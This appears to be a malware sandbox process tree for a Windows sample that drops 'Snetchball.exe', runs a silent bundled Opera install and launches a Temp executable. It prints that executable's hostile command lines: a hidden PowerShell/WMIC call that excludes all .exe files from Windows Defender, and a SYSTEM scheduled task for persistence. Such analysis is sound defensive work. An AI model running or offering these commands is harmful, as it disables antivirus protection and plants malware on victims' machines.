C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3068 --field-trial-handle=2872,i,15388689735004980344,1046342718699052538,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:87⤵
- Executes dropped EXE
- Loads dropped DLL
PID:620 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3172 --field-trial-handle=2872,i,15388689735004980344,1046342718699052538,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:3532 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3184 --field-trial-handle=2872,i,15388689735004980344,1046342718699052538,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:3776 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies Control Panel
PID:4852 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2876 --field-trial-handle=2880,i,8313210202729395025,15962647928681082990,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:29⤵
- Executes dropped EXE
PID:4920 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3100 --field-trial-handle=2880,i,8313210202729395025,15962647928681082990,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:89⤵
- Executes dropped EXE
PID:5964 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3116 --field-trial-handle=2880,i,8313210202729395025,15962647928681082990,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:89⤵
- Executes dropped EXE
PID:1424 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3136 --field-trial-handle=2880,i,8313210202729395025,15962647928681082990,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Checks computer location settings
- Executes dropped EXE
PID:3152 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3140 --field-trial-handle=2880,i,8313210202729395025,15962647928681082990,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Checks computer location settings
- Executes dropped EXE
PID:5240 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies Control Panel
PID:5124 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2864 --field-trial-handle=2868,i,4550213007828169570,17431732936423297949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:211⤵
- Executes dropped EXE
PID:5200 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3164 --field-trial-handle=2868,i,4550213007828169570,17431732936423297949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:811⤵
- Executes dropped EXE
PID:4432 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3168 --field-trial-handle=2868,i,4550213007828169570,17431732936423297949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:811⤵
- Executes dropped EXE
PID:4980 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3208 --field-trial-handle=2868,i,4550213007828169570,17431732936423297949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:111⤵
- Checks computer location settings
- Executes dropped EXE
PID:4928 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3212 --field-trial-handle=2868,i,4550213007828169570,17431732936423297949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:111⤵
- Checks computer location settings
- Executes dropped EXE
PID:5696 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"10⤵
- Executes dropped EXE
PID:4504 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"10⤵
- Executes dropped EXE
PID:1216 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"10⤵
- Executes dropped EXE
PID:3792 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"10⤵
- Executes dropped EXE
PID:1752 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"10⤵
- Executes dropped EXE
PID:4820 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
PID:552 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
PID:4300 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
PID:5468 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
PID:4344 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=6052 --field-trial-handle=2872,i,15388689735004980344,1046342718699052538,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:27⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:5024 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 23044⤵
- Program crash
PID:2812 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 19804⤵
- Program crash
PID:2736 -
C:\Users\Admin\AppData\Local\Temp\PDNFXBP9\lOyDlKbc.exeC:\Users\Admin\AppData\Local\Temp\PDNFXBP9\lOyDlKbc.exe --silent --allusers=04⤵
- Executes dropped EXE
PID:4708 -
C:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exe --silent --allusers=0 --server-tracking-blob=MzNjMTA4ZjMyY2NhODIyNzg2OTFkNzI4YjQ4OTAxYmJlMWY4Y2VjZDE3ZDU5NWRhOTdlYmM3N2Y1NTIxOWU0ZTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInRpbWVzdGFtcCI6IjE3MjExMDY4NTUuMzk5MiIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTguMC4wLjAgU2FmYXJpLzUzNy4zNiIsInV0bSI6eyJjYW1wYWlnbiI6Im9wMTMyIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiUlNUUCJ9LCJ1dWlkIjoiMmQyNzdlYWYtNGUwZi00YjgzLWI5M2ItNWIyYzhmMGFiNjQxIn0=5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
PID:2932 -
C:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x338,0x33c,0x340,0x334,0x344,0x7246b1f4,0x7246b200,0x7246b20c6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1828 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:780 -
C:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exe"C:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2932 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240716051422" --session-guid=6ac85972-20d2-4b1a-8fb5-2fb666282061 --server-tracking-blob=YTMzYWZmM2RkZTFhODJlMzA0NTUzZTFiODk0NTkxZDI2MzFiZGY5MjE0OTFmOWM0MjJkMjQ0ZTQ1ODBlZjI2Mzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcyMTEwNjg1NS4zOTkyIiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiIyZDI3N2VhZi00ZTBmLTRiODMtYjkzYi01YjJjOGYwYWI2NDEifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0C060000000000006⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:3488 -
C:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x320,0x324,0x328,0x2fc,0x32c,0x718bb1f4,0x718bb200,0x718bb20c7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2296 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160514221\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160514221\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"6⤵
- Executes dropped EXE
PID:2736 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160514221\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160514221\assistant\assistant_installer.exe" --version6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5464 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160514221\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160514221\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.25 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x9b9f88,0x9b9f94,0x9b9fa07⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5500 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 23044⤵
- Program crash
PID:1180 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 23364⤵
- Program crash
PID:1204 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 22364⤵
- Program crash
PID:1040 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\48DD1CqE\LsO2143M1d0.exe"4⤵PID:1300
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\48DD1CqE\LsO2143M1d0.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5128 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 23124⤵
- Program crash
PID:4772 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 22364⤵
- Program crash
PID:5360 -
C:\Users\Admin\AppData\Local\Temp\48DD1CqE\LsO2143M1d0.exeC:\Users\Admin\AppData\Local\Temp\48DD1CqE\LsO2143M1d0.exe /did=757674 /S4⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
PID:5416 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵PID:5924
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵PID:5984
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6024 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
PID:5376 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bEtnHIcecDUtXwQuWS" /SC once /ST 05:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\48DD1CqE\LsO2143M1d0.exe\" z0 /KNdids 757674 /S" /V1 /F5⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:5620 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 7285⤵
- Program crash
PID:1492 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 22564⤵
- Program crash
PID:5468 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 22964⤵
- Program crash
PID:5516 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 20164⤵
- Program crash
PID:5560 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 22964⤵
- Program crash
PID:5604 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 23324⤵
- Program crash
PID:5648 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 19644⤵
- Program crash
PID:5800 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 19244⤵
- Program crash
PID:5888 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 20004⤵
- Program crash
PID:5992 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 23404⤵
- Program crash
PID:5276 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 22204⤵
- Program crash
PID:5356 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 19204⤵
- Program crash
PID:5568 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 13244⤵
- Program crash
PID:5764 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 20124⤵
- Program crash
PID:3964 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 19284⤵
- Program crash
PID:2008 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 18924⤵
- Program crash
PID:6124 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 17884⤵
- Program crash
PID:5564 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 11124⤵PID:780
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 14244⤵PID:1424
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1112 -ip 11121⤵PID:1040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 1112 -ip 11121⤵PID:1552
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1112 -ip 11121⤵PID:2132
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1112 -ip 11121⤵PID:1432
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1112 -ip 11121⤵PID:2996
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1112 -ip 11121⤵PID:4848
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1112 -ip 11121⤵PID:4840
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1112 -ip 11121⤵PID:436
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1112 -ip 11121⤵PID:736
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1112 -ip 11121⤵PID:1768
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1112 -ip 11121⤵PID:4672
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1112 -ip 11121⤵PID:1300
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1112 -ip 11121⤵PID:4780
-
